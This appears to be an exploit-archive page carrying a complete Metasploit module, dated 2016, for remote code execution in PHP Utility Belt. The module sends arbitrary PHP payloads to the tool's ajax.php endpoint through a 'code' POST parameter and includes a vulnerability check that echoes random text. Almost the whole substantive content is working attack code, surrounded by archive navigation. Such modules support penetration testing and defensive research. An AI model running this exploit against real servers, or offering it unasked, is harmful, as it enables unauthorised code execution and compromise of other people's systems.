PHP Utility Belt Remote Code Execution

PHP Utility Belt Remote Code Execution: Posted Mar 11, 2016; Authored by Jay Turla, WICS | Site metasploit.com; This Metasploit module exploits a remote code execution vulnerability in PHP Utility Belt, which is a set of tools for PHP developers and should not be installed in a production environment, since this application runs arbitrary PHP code as an intended functionality.; tags | exploit, remote, arbitrary, php, code execution; SHA-256 | 2e8528e3811c7d93f83ce9f7eaaa80a6321b298dc7b5c63c52212036dbd43291; Download | Favorite | View

PHP Utility Belt Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP Utility Belt Remote Code Execution',
      'Description'    => %q{
         This module exploits a remote code execution vulnerability in PHP Utility Belt,
         which is a set of tools for PHP developers and should not be installed in a
         production environment, since this application runs arbitrary PHP code as an
         intended functionality.
      },
      'Author'         =>
        [
          'WICS',     # initial discovery
          'Jay Turla' # msf
        ],
      'References'     =>
        [
          ['EDB', '38901'],
          ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
        ],
      'DisclosureDate' => 'Aug 12 2015',
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          ['PHP Utility Belt', {}]
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
      ], self.class)
  end

  def check
    txt = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{txt};")

    if res && res.body.include?(txt)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    http_send_command(payload.encoded)
  end

  def http_send_command(cmd)
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        'code' => cmd
      }
    )
  end

end

Top Authors In Last 30 Days

Red Hat 145 files
Ubuntu 108 files
Debian 16 files
Rafael Pedrero 11 files
LiquidWorm 10 files
Google Security Research 9 files
Apple 9 files
Abdulhakim Oner 8 files
nu11secur1ty 8 files
Hubert Wojciechowski 6 files

File Archives

Systems

AIX (426)
Apple (1,960)
BSD (372)
CentOS (56)
Cisco (1,919)
Debian (6,714)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,288)
HPUX (878)
iOS (340)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,137)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,925)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,453)
UNIX (9,208)
UnixWare (185)
Windows (6,532)
Other

PHP Utility Belt Remote Code Execution

PHP Utility Belt Remote Code Execution

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP Utility Belt Remote Code Execution

Share This

PHP Utility Belt Remote Code Execution

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems